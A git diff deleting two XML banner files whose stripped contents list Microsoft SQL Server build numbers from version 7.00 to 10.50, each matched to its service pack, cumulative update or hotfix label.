index fc2fb97f59a..00000000000
--- a/data/xml/banner/generic.xml
+++ /dev/null
@@ -1,177 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/data/xml/banner/mssql.xml b/data/xml/banner/mssql.xml
deleted file mode 100644
index f3d5eceba51..00000000000
--- a/data/xml/banner/mssql.xml
+++ /dev/null
@@ -1,4245 +0,0 @@
-
-
-
-
-
- 10.50.2418
-
-
- 1 CTP
-
-
-
-
- 10.50.1797
-
-
- 0+Cumulative Update 8
-
-
-
-
- 10.50.1790
-
-
- 0+Q2494086
-
-
-
-
- 10.50.1777
-
-
- 0+Cumulative Update 7
-
-
-
-
- 10.50.1765
-
-
- 0+Cumulative Update 6
-
-
-
-
- 10.50.1753
-
-
- 0+Cumulative Update 5
-
-
-
-
- 10.50.1746
-
-
- 0+Cumulative Update 4
-
-
-
-
- 10.50.1734
-
-
- 0+Cumulative Update 3
-
-
-
-
- 10.50.1720
-
-
- 0+Cumulative Update 2
-
-
-
-
- 10.50.1702
-
-
- 0+Cumulative Update 1
-
-
-
-
- 10.50.1600.1
-
-
- 0
-
-
-
-
- 10.50.1450.3
-
-
- 0
-
-
-
-
-
-
- 10.00.4311
-
-
- 2+Q2494094
-
-
-
-
- 10.00.4285
-
-
- 2+Cumulative Update 4
-
-
-
-
- 10.00.4279
-
-
- 2+Cumulative Update 3
-
-
-
-
- 10.00.4272
-
-
- 2+Cumulative Update 2
-
-
-
-
- 10.00.4266
-
-
- 2+Cumulative Update 1
-
-
-
-
- 10.00.4000
-
-
- 2
-
-
-
-
- 10.00.2841
-
-
- 1+Q2494100
-
-
-
-
- 10.00.2821
-
-
- 1+Cumulative Update 14
-
-
-
-
- 10.00.2816
-
-
- 1+Cumulative Update 13
-
-
-
-
- 10.00.2808
-
-
- 1+Cumulative Update 12
-
-
-
-
- 10.00.2804
-
-
- 0+Q2413738
-
-
-
-
- 10.00.2799
-
-
- 1+Cumulative Update 10
-
-
-
-
- 10.00.2789
-
-
- 1+Cumulative Update 9
-
-
-
-
- 10.00.2775
-
-
- 1+Cumulative Update 8
-
-
-
-
- 10.00.2766
-
-
- 1+Cumulative Update 7
-
-
-
-
- 10.00.2760
-
-
- 0+Q978839
-
-
-
-
- 10.00.2758
-
-
- 1+Q978791
-
-
-
-
- 10.00.2757
-
-
- 1+Cumulative Update 6
-
-
-
-
- 10.00.2746
-
-
- 1+Cumulative Update 5
-
-
-
-
- 10.00.2740
-
-
- 0+Q976761
-
-
-
-
- 10.00.2734
-
-
- 1+Cumulative Update 4
-
-
-
-
- 10.00.2723
-
-
- 1+Cumulative Update 3
-
-
-
-
- 10.00.2714
-
-
- 1+Cumulative Update 2
-
-
-
-
- 10.00.2712
-
-
- 0+Q970507
-
-
-
-
- 10.00.2710
-
-
- 1+Cumulative Update 1
-
-
-
-
- 10.00.2531
-
-
- 1
-
-
-
-
- 10.00.1835
-
-
- 0+Cumulative Update 10
-
-
-
-
- 10.00.1828
-
-
- 0+Cumulative Update 9
-
-
-
-
- 10.00.1823
-
-
- 0+Cumulative Update 8
-
-
-
-
- 10.00.1818
-
-
- 0+Q973601
-
-
-
-
- 10.00.1812
-
-
- 0+Cumulative Update 6
-
-
-
-
- 10.00.1806
-
-
- 0+Cumulative Update 5
-
-
-
-
- 10.00.1798
-
-
- 0+Cumulative Update 4
-
-
-
-
- 10.00.1787
-
-
- 0+Cumulative Update 3
-
-
-
-
- 10.00.1779
-
-
- 0+Q958186
-
-
-
-
- 10.00.1771
-
-
- 0+Q958611
-
-
-
-
- 10.00.1763
-
-
- 0+Q956717
-
-
-
-
- 10.00.1755
-
-
- 0+Q957387
-
-
-
-
- 10.00.1750
-
-
- 0+Q956718
-
-
-
-
- 10.00.1600.22
-
-
- 0
-
-
-
-
- 10.00.1300.13
-
-
- February CTP
-
-
-
-
- 10.00.1049.14
-
-
- July CTP
-
-
-
-
- 10.00.1019.17
-
-
- June CTP
-
-
-
-
-
-
- 9.00.5292
-
-
- 4+Q2494123
-
-
-
-
- 9.00.5266
-
-
- 4 Cumulative Update 3
-
-
-
-
- 9.00.5254
-
-
- 4 Cumulative Update 1
-
-
-
-
- 9.00.5000
-
-
- 4
-
-
-
-
- 9.00.4912
-
-
- 4 CTP
-
-
-
-
- 9.00.4340
-
-
- 3+Q2494112
-
-
-
-
- 9.00.4325
-
-
- 3+Q2438344
-
-
-
-
- 9.00.4315
-
-
- 3+Q2438344
-
-
-
-
- 9.00.4311
-
-
- 3+Q2345449
-
-
-
-
- 9.00.4309
-
-
- 3+Q2258854
-
-
-
-
- 9.00.4305
-
-
- 3+Q983329
-
-
-
-
- 9.00.4294
-
-
- 3+Q980176
-
-
-
-
- 9.00.4285
-
-
- 3+Q978915
-
-
-
-
- 9.00.4278
-
-
- 3+Q978791
-
-
-
-
- 9.00.4273
-
-
- 3+Q976951
-
-
-
-
- 9.00.4266
-
-
- 3+Q974648
-
-
-
-
- 9.00.4230
-
-
- 3+Q972511
-
-
-
-
- 9.00.4226
-
-
- 3+Q970279
-
-
-
-
- 9.00.4224
-
-
- 3+Q971409
-
-
-
-
- 9.00.4220
-
-
- 3+Q967909
-
-
-
-
- 9.00.4216
-
-
- 3+Q967101
-
-
-
-
- 9.00.4211
-
-
- 3+Q961930
-
-
-
-
- 9.00.4207
-
-
- 3+Q959195
-
-
-
-
- 9.00.4053
-
-
- 3
-
-
-
-
- 9.00.4035
-
-
- 3
-
-
-
-
- 9.00.3356
-
-
- 2+Cumulative Update 17
-
-
-
-
- 9.00.3355
-
-
- 2+Q216793
-
-
-
-
- 9.00.3330
-
-
- 2+Q972510
-
-
-
-
- 9.00.3328
-
-
- 2+Q970278
-
-
-
-
- 9.00.3327
-
-
- 2+Q948567
-
-
-
-
- 9.00.3325
-
-
- 2+Q967908
-
-
-
-
- 9.00.3320
-
-
- 2+Q969142
-
-
-
-
- 9.00.3318
-
-
- 2+Q967199
-
-
-
-
- 9.00.3315
-
-
- 2+Q962970
-
-
-
-
- 9.00.3310
-
-
- 2+Q960090
-
-
-
-
- 9.00.3303
-
-
- 2+Q962209
-
-
-
-
- 9.00.3302
-
-
- 2+Q961479
-
-
-
-
- 9.00.3301
-
-
- 2+Q958735
-
-
-
-
- 9.00.3295
-
-
- 2+Q959132
-
-
-
-
- 9.00.3294
-
-
- 2+Q956854
-
-
-
-
- 9.00.3291
-
-
- 2+Q956889
-
-
-
-
- 9.00.3289
-
-
- 2+Q937137
-
-
-
-
- 9.00.3282
-
-
- 2+Q953752
-
-
-
-
- 9.00.3261
-
-
- 2+Q955754
-
-
-
-
- 9.00.3260
-
-
- 2+Q954950
-
-
-
-
- 9.00.3259
-
-
- 2+Q954669
-
-
-
-
- 9.00.3257
-
-
- 2+Q951217
-
-
-
-
- 9.00.3253
-
-
- 2+Q954054
-
-
-
-
- 9.00.3244
-
-
- 2+Q952330
-
-
-
-
- 9.00.3242
-
-
- 2+Q951190
-
-
-
-
- 9.00.3240
-
-
- 2+Q951204
-
-
-
-
- 9.00.3239
-
-
- 2+Q949095
-
-
-
-
- 9.00.3235
-
-
- 2+Q950189
-
-
-
-
- 9.00.3232
-
-
- 2+Q949959
-
-
-
-
- 9.00.3231
-
-
- 2+Q949687
-
-
-
-
- 9.00.3230
-
-
- 2+Q949199
-
-
-
-
- 9.00.3228
-
-
- 2+Q946608
-
-
-
-
- 9.00.3224
-
-
- 2+Q947463
-
-
-
-
- 9.00.3222
-
-
- 2+Q945640
-
-
-
-
- 9.00.3221
-
-
- 2+Q942908
-
-
-
-
- 9.00.3215
-
-
- 2+Q941450
-
-
-
-
- 9.00.3209
-
-
- 2
-
-
-
-
- 9.00.3208
-
-
- 2+Q944902
-
-
-
-
- 9.00.3206
-
-
- 2+Q944677
-
-
-
-
- 9.00.3205
-
-
- 2
-
-
-
-
- 9.00.3203
-
-
- 2
-
-
-
-
- 9.00.3200
-
-
- 2+Q941450
-
-
-
-
- 9.00.3195
-
-
- 2
-
-
-
-
- 9.00.3194
-
-
- 2+Q940933
-
-
-
-
- 9.00.3186
-
-
- 2+Q939562
-
-
-
-
- 9.00.3182
-
-
- 2+Q940128
-
-
-
-
- 9.00.3180
-
-
- 2+Q939942
-
-
-
-
- 9.00.3179
-
-
- 2+Q938243
-
-
-
-
- 9.00.3178
-
-
- 2
-
-
-
-
- 9.00.3177
-
-
- 2+Q939563
-
-
-
-
- 9.00.3175
-
-
- 2+Q936305
-
-
-
-
- 9.00.3171
-
-
- 2+Q937745
-
-
-
-
- 9.00.3169
-
-
- 2+Q937041
-
-
-
-
- 9.00.3166
-
-
- 2+Q936185
-
-
-
-
- 9.00.3162
-
-
- 2+Q932610
-
-
-
-
- 9.00.3161
-
-
- 2+Q935356
-
-
-
-
- 9.00.3159
-
-
- 2+Q934459
-
-
-
-
- 9.00.3156
-
-
- 2+Q934226
-
-
-
-
- 9.00.3155
-
-
- 2+Q933549
-
-
-
-
- 9.00.3154
-
-
- 2+Q934106
-
-
-
-
- 9.00.3153
-
-
- 2+Q933564
-
-
-
-
- 9.00.3152
-
-
- 2+Q933097
-
-
-
-
- 9.00.3080
-
-
- 2+Q970895
-
-
-
-
- 9.00.3077
-
-
- 2+Q960089
-
-
-
-
- 9.00.3073
-
-
- 2+Q954606
-
-
-
-
- 9.00.3054
-
-
- 2+Q934458
-
-
-
-
- 9.00.3050
-
-
- 2+Q933508
-
-
-
-
- 9.00.3043
-
-
- 2+Q933508
-
-
-
-
- 9.00.3042
-
-
- 'Fixed' 2
-
-
-
-
- 9.00.3033
-
-
- 2 CTP
-
-
-
-
- 9.00.3027
-
-
- 2 CTP
-
-
-
-
- 9.00.3026
-
-
- 1+Q929376
-
-
-
-
- 9.00.2249
-
-
- 1+Q948344
-
-
-
-
- 9.00.2245
-
-
- 1+Q933573
-
-
-
-
- 9.00.2243
-
-
- 1+Q944968
-
-
-
-
- 9.00.2242
-
-
- 1+Q943389
-
-
-
-
- 9.00.2239
-
-
- 1+Q940961
-
-
-
-
- 9.00.2237
-
-
- 1+Q940719
-
-
-
-
- 9.00.2236
-
-
- 1+Q940287
-
-
-
-
- 9.00.2234
-
-
- 1+Q937343
-
-
-
-
- 9.00.2233
-
-
- 1+Q933499
-
-
-
-
- 9.00.2232
-
-
- 1+Q937277
-
-
-
-
- 9.00.2231
-
-
- 1+Q934812
-
-
-
-
- 9.00.2230
-
-
- 1+Q936179
-
-
-
-
- 9.00.2229
-
-
- 1+Q935446
-
-
-
-
- 9.00.2227
-
-
- 1+Q934066
-
-
-
-
- 9.00.2226
-
-
- 1+Q933762
-
-
-
-
- 9.00.2224
-
-
- 1+Q932990
-
-
-
-
- 9.00.2223
-
-
- 1+Q932393
-
-
-
-
- 9.00.2221
-
-
- 1+Q931593
-
-
-
-
- 9.00.2219
-
-
- 1+Q931329
-
-
-
-
- 9.00.2218
-
-
- 1+Q931843
-
-
-
-
- 9.00.2216
-
-
- 1+Q931821
-
-
-
-
- 9.00.2215
-
-
- 1+Q931666
-
-
-
-
- 9.00.2214
-
-
- 1+Q929240
-
-
-
-
- 9.00.2211
-
-
- 1+Q930283
-
-
-
-
- 9.00.2209
-
-
- 1+Q929278
-
-
-
-
- 9.00.2208
-
-
- 1+Q929179
-
-
-
-
- 9.00.2207
-
-
- 1+Q928394<
-
-
-
-
- 9.00.2206
-
-
- 1+Q928539
-
-
-
-
- 9.00.2202
-
-
- 1+Q927643
-
-
-
-
- 9.00.2201
-
-
- 1+Q927289
-
-
-
-
- 9.00.2198
-
-
- 1+Q926773
-
-
-
-
- 9.00.2196
-
-
- 1+Q926285
-
-
-
-
- 9.00.2195
-
-
- 1+Q926240
-
-
-
-
- 9.00.2194
-
-
- 1+Q925744
-
-
-
-
- 9.00.2192
-
-
- 1+Q924954
-
-
-
-
- 9.00.2191
-
-
- 1+Q925135
-
-
-
-
- 9.00.2190
-
-
- 1+Q925227
-
-
-
-
- 9.00.2189
-
-
- 1+Q925153
-
-
-
-
- 9.00.2187
-
-
- 1+Q923849
-
-
-
-
- 9.00.2183
-
-
- 1+Q929404
-
-
-
-
- 9.00.2181
-
-
- 1+Q923624
-
-
-
-
- 9.00.2176
-
-
- 1+Q923296
-
-
-
-
- 9.00.2175
-
-
- 1+Q922578
-
-
-
-
- 9.00.2174
-
-
- 1+Q922063
-
-
-
-
- 9.00.2167
-
-
- 1+Q920974
-
-
-
-
- 9.00.2164
-
-
- 1+Q919636
-
-
-
-
- 9.00.2156
-
-
- 1+Q919611
-
-
-
-
- 9.00.2153
-
-
- 1+builds 1531
-
-
-
-
- 9.00.2050
-
-
- 1+.NET Vulnerability fix
-
-
-
-
- 9.00.2047
-
-
- 1 0
-
-
-
-
- 9.00.2040
-
-
- 1 CTP
-
-
-
-
- 9.00.2029
-
-
- 1 Beta
-
-
-
-
- 9.00.1561
-
-
- 0+Q932556
-
-
-
-
- 9.00.1558
-
-
- 0+Q926493
-
-
-
-
- 9.00.1554
-
-
- 0+Q926292
-
-
-
-
- 9.00.1551
-
-
- 0+Q922804
-
-
-
-
- 9.00.1550
-
-
- 0+Q917887
-
-
-
-
- 9.00.1547
-
-
- 0+Q918276
-
-
-
-
- 9.00.1545
-
-
- 0+Q917905
-
-
-
-
- 9.00.1541
-
-
- 0+Q917888
-
-
-
-
- 9.00.1539
-
-
- 0+Q917738
-
-
-
-
- 9.00.1538
-
-
- 0+Q917824
-
-
-
-
- 9.00.1536
-
-
- 0+Q917016
-
-
-
-
- 9.00.1534
-
-
- 0+Q916706
-
-
-
-
- 9.00.1533
-
-
- 0+Q916086
-
-
-
-
- 9.00.1532
-
-
- 0+Q916046
-
-
-
-
- 9.00.1531
-
-
- 0+Q915918
-
-
-
-
- 9.00.1528
-
-
- 0+Q915112
-
-
-
-
- 9.00.1519
-
-
- 0+Q913494
-
-
-
-
- 9.00.1518
-
-
- 0+Q912472
-
-
-
-
- 9.00.1514
-
-
- 0+Q912471
-
-
-
-
- 9.00.1503
-
-
- 0+Q911662
-
-
-
-
- 9.00.1502
-
-
- 0+Q915793
-
-
-
-
- 9.00.1500
-
-
- 0+Q910416
-
-
-
-
- 9.00.1406
-
-
- 0+Q932557
-
-
-
-
- 9.00.1399
-
-
- 0
-
-
-
-
- 9.00.1314
-
-
- September CTP Release
-
-
-
-
- 9.00.1187
-
-
- June CTP Release
-
-
-
-
- 9.00.1116
-
-
- April CTP Release
-
-
-
-
- 9.00.1090
-
-
- March CTP Release
-
-
-
-
- 9.00.981
-
-
- December CTP Release
-
-
-
-
- 9.00.951
-
-
- October CTP Release
-
-
-
-
- 9.00.917
-
-
- Internal build
-
-
-
-
- 9.00.852
-
-
- Beta 2
-
-
-
-
- 9.00.849
-
-
- Internal build
-
-
-
-
- 9.00.844
-
-
- Internal build
-
-
-
-
- 9.00.836
-
-
- Express Ed. Tech Preview
-
-
-
-
- 9.00.823
-
-
- Internal build
-
-
-
-
- 9.00.790
-
-
- Internal build
-
-
-
-
- 9.00.767
-
-
- Internal build
-
-
-
-
- 9.00.747
-
-
- Internal build
-
-
-
-
- 9.00.645
-
-
- MS Internal
-
-
-
-
- 9.00.608
-
-
- Beta 1
-
-
-
-
-
-
- 7.00.1152
-
-
- 4+Q941203
-
-
-
-
- 7.00.1150
-
-
- 4+Q891116
-
-
-
-
- 7.00.1144
-
-
- 4+Q830233
-
-
-
-
- 7.00.1143
-
-
- 4+Q829015
-
-
-
-
- 7.00.1097
-
-
- 4+Q822756
-
-
-
-
- 7.00.1094
-
-
- 4+Q815495
-
-
-
-
- 7.00.1079
-
-
- 329499
-
-
-
-
- 7.00.1078
-
-
- 4+Q327068
-
-
-
-
- 7.00.1077
-
-
- 4+Q316333
-
-
-
-
- 7.00.1063
-
-
- 4
-
-
-
-
- 7.00.1033
-
-
- 3+Q324469
-
-
-
-
- 7.00.1026
-
-
- 3+Q319851
-
-
-
-
- 7.00.1004
-
-
- 3+Q304851
-
-
-
-
- 7.00.996
-
-
- 3+Q299717
-
-
-
-
- 7.00.978
-
-
- 3+Q285870
-
-
-
-
- 7.00.977
-
-
- 3+Q284351
-
-
-
-
- 7.00.970
-
-
- 3+Q283837
-
-
-
-
- 7.00.961
-
-
- 3
-
-
-
-
- 7.00.921
-
-
- 2+Q283837
-
-
-
-
- 7.00.919
-
-
- 2+Q282243
-
-
-
-
- 7.00.918
-
-
- 2+Q280380
-
-
-
-
- 7.00.917
-
-
- 2+Q279180
-
-
-
-
- 7.00.910
-
-
- 2+Q275901
-
-
-
-
- 7.00.905
-
-
- 2+Q274266
-
-
-
-
- 7.00.889
-
-
- 2+Q243741
-
-
-
-
- 7.00.879
-
-
- 2+Q281185
-
-
-
-
- 7.00.857
-
-
- 2+Q260346
-
-
-
-
- 7.00.842
-
-
- 2
-
-
-
-
- 7.00.839
-
-
- 2 Unidentified
-
-
-
-
- 7.00.835
-
-
- 2 Beta
-
-
-
-
- 7.00.776
-
-
- 1+Q258087
-
-
-
-
- 7.00.770
-
-
- 1+Q252905
-
-
-
-
- 7.00.745
-
-
- 1+Q253738
-
-
-
-
- 7.00.722
-
-
- 1+Q239458
-
-
-
-
- 7.00.699
-
-
- 1
-
-
-
-
- 7.00.689
-
-
- 1 Beta
-
-
-
-
- 7.00.677
-
-
- MSDE O2K Dev
-
-
-
-
- 7.00.662
-
-
- Gold+Q232707
-
-
-
-
- 7.00.658
-
-
- Gold+Q244763
-
-
-
-
- 7.00.657
-
-
- Gold+Q229875
-
-
-
-
- 7.00.643
-
-
- Gold+Q220156
-
-
-
-
- 7.00.623
-
-
- Gold
-
-
-
-
- 7.00.583
-
-
- RC1
-
-
-
-
- 7.00.517
-
-
- Beta 3
-
-
-
-
-
-
- 8.00.2283
-
-
- 4+Q971524
-
-
-
-
- 8.00.2279
-
-
- 4+Q959678
-
-
-
-
- 8.00.2271
-
-
- 4+Q946584
-
-
-
-
- 8.00.2265
-
-
- 4+Q944985
-
-
-
-
- 8.00.2253
-
-
- 4+Q939317
-
-
-
-
- 8.00.2249
-
-
- 4+Q936232
-
-
-
-
- 8.00.2248
-
-
- 4+Q935950
-
-
-
-
- 8.00.2246
-
-
- 4+Q935465
-
-
-
-
- 8.00.2245
-
-
- 4+Q933573
-
-
-
-
- 8.00.2244
-
-
- 4+Q934203
-
-
-
-
- 8.00.2242
-
-
- 4+Q929131
-
-
-
-
- 8.00.2238
-
-
- 4+Q931932
-
-
-
-
- 8.00.2234
-
-
- 4+Q929440
-
-
-
-
- 8.00.2232
-
-
- 4+Q928568
-
-
-
-
- 8.00.2231
-
-
- 4+Q928079
-
-
-
-
- 8.00.2229
-
-
- 4+Q927186
-
-
-
-
- 8.00.2226
-
-
- 4+Q925684
-
-
-
-
- 8.00.2223
-
-
- 4+Q925678
-
-
-
-
- 8.00.2218
-
-
- 4+Q925297
-
-
-
-
- 8.00.2217
-
-
- 4+Q924664
-
-
-
-
- 8.00.2215
-
-
- 4+Q924662
-
-
-
-
- 8.00.2209
-
-
- 4+Q923797
-
-
-
-
- 8.00.2207
-
-
- 4+Q923344
-
-
-
-
- 8.00.2201
-
-
- 4+Q920930
-
-
-
-
- 8.00.2199
-
-
- 4+Q919221
-
-
-
-
- 8.00.2197
-
-
- 4+Q919133
-
-
-
-
- 8.00.2196
-
-
- 4+Q919165
-
-
-
-
- 8.00.2194
-
-
- 4+Q917972
-
-
-
-
- 8.00.2192
-
-
- 4+Q917606
-
-
-
-
- 8.00.2191
-
-
- 4+Q916698
-
-
-
-
- 8.00.2189
-
-
- 4+Q916652
-
-
-
-
- 8.00.2187
-
-
- 4+916287
-
-
-
-
- 8.00.2180
-
-
- 4+Q913684
-
-
-
-
- 8.00.2175
-
-
- 4+Q911678
-
-
-
-
- 8.00.2172
-
-
- 4+Q910707
-
-
-
-
- 8.00.2171
-
-
- 4+Q909369
-
-
-
-
- 8.00.2168
-
-
- 4+Q907813
-
-
-
-
- 8.00.2167
-
-
- 4+Q921293
-
-
-
-
- 8.00.2166
-
-
- 4+Q909734
-
-
-
-
- 8.00.2162
-
-
- 4+Q904660
-
-
-
-
- 8.00.2156
-
-
- 4+Q906790
-
-
-
-
- 8.00.2151
-
-
- 4+Q903742
-
-
-
-
- 8.00.2148
-
-
- 4+Q899430
-
-
-
-
- 8.00.2147
-
-
- 4+Q899410
-
-
-
-
- 8.00.2145
-
-
- 4+Q826906
-
-
-
-
- 8.00.2055
-
-
- 4+Q959420
-
-
-
-
- 8.00.2040
-
-
- 4+Q899761
-
-
-
-
- 8.00.2039
-
-
- 4
-
-
-
-
- 8.00.2026
-
-
- 4 Beta
-
-
-
-
- 8.00.1547
-
-
- 3+Q899410
-
-
-
-
- 8.00.1037
-
-
- 3+Q930484
-
-
-
-
- 8.00.1036
-
-
- 3+Q929410
-
-
-
-
- 8.00.1035
-
-
- 3+Q917593
-
-
-
-
- 8.00.1034
-
-
- 3+Q915328
-
-
-
-
- 8.00.1029
-
-
- 3+Q902852
-
-
-
-
- 8.00.1027
-
-
- 3+Q900416
-
-
-
-
- 8.00.1025
-
-
- 3+Q899428
-
-
-
-
- 8.00.1024
-
-
- 3+Q898709
-
-
-
-
- 8.00.1021
-
-
- 3+Q887700
-
-
-
-
- 8.00.1020
-
-
- 3+Q896985
-
-
-
-
- 8.00.1019
-
-
- 3+Q897572
-
-
-
-
- 8.00.1017
-
-
- 3+Q896425
-
-
-
-
- 8.00.1014
-
-
- 3+Q895123
-
-
-
-
- 8.00.1013
-
-
- 3+Q891866
-
-
-
-
- 8.00.1009
-
-
- 3+Q894257
-
-
-
-
- 8.00.1007
-
-
- 3+Q893312
-
-
-
-
- 8.00.1000
-
-
- 3+Q891585
-
-
-
-
- 8.00.997
-
-
- 3+Q891311
-
-
-
-
- 8.00.996
-
-
- 3+Q891017
-
-
-
-
- 8.00.994
-
-
- 3+Q890942
-
-
-
-
- 8.00.993
-
-
- 3+Q890925
-
-
-
-
- 8.00.991
-
-
- 3+Q889314
-
-
-
-
- 8.00.990
-
-
- 3+Q890200
-
-
-
-
- 8.00.988
-
-
- 3+Q889166
-
-
-
-
- 8.00.985
-
-
- 3+Q889239
-
-
-
-
- 8.00.980
-
-
- 3+Q887974
-
-
-
-
- 8.00.977
-
-
- 3+Q888007
-
-
-
-
- 8.00.973
-
-
- 3+Q884554
-
-
-
-
- 8.00.972
-
-
- 3+Q885290
-
-
-
-
- 8.00.970
-
-
- 3+Q872842
-
-
-
-
- 8.00.967
-
-
- 3+Q878501
-
-
-
-
- 8.00.962
-
-
- 3+Q883415
-
-
-
-
- 8.00.961
-
-
- 3+Q873446
-
-
-
-
- 8.00.959
-
-
- 3+Q878500
-
-
-
-
- 8.00.957
-
-
- 3+Q870994
-
-
-
-
- 8.00.955
-
-
- 3+Q867798
-
-
-
-
- 8.00.954
-
-
- 3+Q843282
-
-
-
-
- 8.00.952
-
-
- 3+Q867878
-
-
-
-
- 8.00.944
-
-
- 3+Q839280
-
-
-
-
- 8.00.937
-
-
- 3+Q841776
-
-
-
-
- 8.00.936
-
-
- 3+Q841627
-
-
-
-
- 8.00.935
-
-
- 3+Q841401
-
-
-
-
- 8.00.934
-
-
- 3+Q841404
-
-
-
-
- 8.00.933
-
-
- 3+Q840856
-
-
-
-
- 8.00.929
-
-
- 3+Q839529
-
-
-
-
- 8.00.928
-
-
- 3+Q839589
-
-
-
-
- 8.00.927
-
-
- 3+Q839688
-
-
-
-
- 8.00.926
-
-
- 3+Q839523
-
-
-
-
- 8.00.923
-
-
- 3+Q838460
-
-
-
-
- 8.00.922
-
-
- 3+Q837970
-
-
-
-
- 8.00.919
-
-
- 3+Q837957
-
-
-
-
- 8.00.916
-
-
- 3+Q317989
-
-
-
-
- 8.00.915
-
-
- 3+Q837401
-
-
-
-
- 8.00.913
-
-
- 3+Q836651
-
-
-
-
- 8.00.911
-
-
- 3+Q837957
-
-
-
-
- 8.00.910
-
-
- 3+Q834798
-
-
-
-
- 8.00.908
-
-
- 3+Q834290
-
-
-
-
- 8.00.904
-
-
- 3+Q834453
-
-
-
-
- 8.00.892
-
-
- 3+Q833710
-
-
-
-
- 8.00.891
-
-
- 3+Q836141
-
-
-
-
- 8.00.879
-
-
- 3+Q832977
-
-
-
-
- 8.00.878
-
-
- 3+Q831950
-
-
-
-
- 8.00.876
-
-
- 3+Q830912
-
-
-
-
- 8.00.873
-
-
- 3+Q830887
-
-
-
-
- 8.00.871
-
-
- 3+Q830767
-
-
-
-
- 8.00.870
-
-
- 3+Q830262
-
-
-
-
- 8.00.869
-
-
- 3+Q830588
-
-
-
-
- 8.00.867
-
-
- 3+Q830366
-
-
-
-
- 8.00.866
-
-
- 3+Q830366
-
-
-
-
- 8.00.865
-
-
- 3+Q830395
-
-
-
-
- 8.00.863
-
-
- 3+Q829205
-
-
-
-
- 8.00.859
-
-
- 3+Q821334
-
-
-
-
- 8.00.858
-
-
- 3+Q828637
-
-
-
-
- 8.00.857
-
-
- 3+Q828017
-
-
-
-
- 8.00.856
-
-
- 3+Q828096
-
-
-
-
- 8.00.854
-
-
- 3+Q828699
-
-
-
-
- 8.00.852
-
-
- 3+Q830466
-
-
-
-
- 8.00.851
-
-
- 3+Q826754
-
-
-
-
- 8.00.850
-
-
- 3+Q826860
-
-
-
-
- 8.00.848
-
-
- 3+Q826822
-
-
-
-
- 8.00.847
-
-
- 3+Q826433
-
-
-
-
- 8.00.845
-
-
- 3+Q826364
-
-
-
-
- 8.00.844
-
-
- 3+Q826080
-
-
-
-
- 8.00.842
-
-
- 3+Q825043
-
-
-
-
- 8.00.841
-
-
- 3+Q825225
-
-
-
-
- 8.00.840
-
-
- 3+Q319477
-
-
-
-
- 8.00.839
-
-
- 3+Q823877
-
-
-
-
- 8.00.837
-
-
- 3+Q821741
-
-
-
-
- 8.00.819
-
-
- 3+Q826161
-
-
-
-
- 8.00.818
-
-
- 3+Q821277
-
-
-
-
- 8.00.816
-
-
- 3+Q818766
-
-
-
-
- 8.00.814
-
-
- 3+Q819662
-
-
-
-
- 8.00.811
-
-
- 3+Q819248
-
-
-
-
- 8.00.807
-
-
- 3+Q818899
-
-
-
-
- 8.00.804
-
-
- 3+Q818729
-
-
-
-
- 8.00.801
-
-
- 3+Q818540
-
-
-
-
- 8.00.800
-
-
- 3+Q818414
-
-
-
-
- 8.00.798
-
-
- 3+Q817464
-
-
-
-
- 8.00.794
-
-
- 3+Q817464
-
-
-
-
- 8.00.791
-
-
- 3+Q815249
-
-
-
-
- 8.00.790
-
-
- 3+Q817081
-
-
-
-
- 8.00.789
-
-
- 3+Q816840
-
-
-
-
- 8.00.788
-
-
- 3+Q816985
-
-
-
-
- 8.00.781
-
-
- 3+Q815057
-
-
-
-
- 8.00.780
-
-
- 3+Q816084
-
-
-
-
- 8.00.779
-
-
- 3+Q814035
-
-
-
-
- 8.00.776
-
-
- 3+Unidentified
-
-
-
-
- 8.00.775
-
-
- 3+Q815115
-
-
-
-
- 8.00.769
-
-
- 3+Q814889
-
-
-
-
- 8.00.765
-
-
- <
-
-
-
-
- 8.00.763
-
-
- 3+Q814113
-
-
-
-
- 8.00.762
-
-
- 3+Q814032
-
-
-
-
- 8.00.760
-
-
- 3
-
-
-
-
- 8.00.743
-
-
- 2+Q818406
-
-
-
-
- 8.00.741
-
-
- 2+Q818096
-
-
-
-
- 8.00.736
-
-
- 2+Q816937
-
-
-
-
- 8.00.735
-
-
- 2+Q814889
-
-
-
-
- 8.00.733
-
-
- 2+Q813759
-
-
-
-
- 8.00.730
-
-
- 2+Q813769
-
-
-
-
- 8.00.728
-
-
- 2+Q814460
-
-
-
-
- 8.00.725
-
-
- 2+Q812995
-
-
-
-
- 8.00.723
-
-
- 2+Q812798
-
-
-
-
- 8.00.721
-
-
- 2+Q812250
-
-
-
-
- 8.00.718
-
-
- 2+Q811703
-
-
-
-
- 8.00.715
-
-
- 2+Q810688
-
-
-
-
- 8.00.714
-
-
- 2+Q811478
-
-
-
-
- 8.00.713
-
-
- 2
-
-
-
-
- 8.00.710
-
-
- 2
-
-
-
-
- 8.00.705
-
-
- 2+Q810920
-
-
-
-
- 8.00.703
-
-
- 2+Q810526
-
-
-
-
- 8.00.702
-
-
- 2+Q328551
-
-
-
-
- 8.00.701
-
-
- 2+Q810026
-
-
-
-
- 8.00.700
-
-
- 2+Q810072
-
-
-
-
- 8.00.696
-
-
- 2+Q810052
-
-
-
-
- 8.00.695
-
-
- 2+Q331885
-
-
-
-
- 8.00.693
-
-
- 2+Q330212
-
-
-
-
- 8.00.689
-
-
- 2+Q329499
-
-
-
-
- 8.00.688
-
-
- 2+Q329487
-
-
-
-
- 8.00.686
-
-
- 2+Q316333
-
-
-
-
- 8.00.682
-
-
- 3+Q319851
-
-
-
-
- 8.00.679
-
-
- 2+Q316333
-
-
-
-
- 8.00.678
-
-
- 2+Q328354
-
-
-
-
- 8.00.667
-
-
- 2+8
-
-
-
-
- 8.00.665
-
-
- 2+8
-
-
-
-
- 8.00.661
-
-
- 2+Q326999
-
-
-
-
- 8.00.655
-
-
- 2+7
-
-
-
-
- 8.00.652
-
-
- 2+Q810010?
-
-
-
-
- 8.00.650
-
-
